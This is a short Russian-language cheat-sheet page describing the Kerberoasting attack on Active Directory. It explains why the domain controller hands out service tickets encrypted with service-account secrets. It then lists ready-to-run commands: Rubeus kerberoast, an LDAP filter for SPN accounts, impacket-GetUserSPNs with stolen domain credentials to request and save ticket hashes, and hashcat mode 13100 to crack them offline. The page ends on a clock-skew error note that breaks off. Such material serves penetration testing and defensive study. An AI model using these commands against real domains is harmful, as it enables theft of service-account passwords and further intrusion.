KERBEROASTING
Условие для проведения атаки:
Учетная запись в домене с присвоенный SPN атрибутом.
Атакующий отправляет KRB_TGS_REQ сообщения с указанием SPN, ассоциированными с выявленными учетными записями. Контроллер домена не занимается авторизацией, то есть не проверяет имеет ли скомпрометированная учетная запись право доступа к запрашиваемым сервисам, (так как для выдачи TGS пользователю достаточно предоставить свой TGT) поэтому в ответ отправляются сообщения, содержащие TGS билеты, зашифрованные с использованием секретов сервисов. Таким образом, получив TGS-билеты, атакующий может попробовать подобрать пароль к сервисам по словарю оффлайн.
Abuse
Rubeus.exe kerberoast /statsLdap request to search for accounts that have SPN.
"(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"Get users with SPN and send TGS-REQ
impacket-GetUserSPNs -dc-ip $DC_IP $Domain_FQDN/$username:$password -request -outputfile $fileBrute
hashcat -m 13100 $kerberos_hashes $dictionaryFix errors
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Если ntpdate или rdate не работают:
Last updated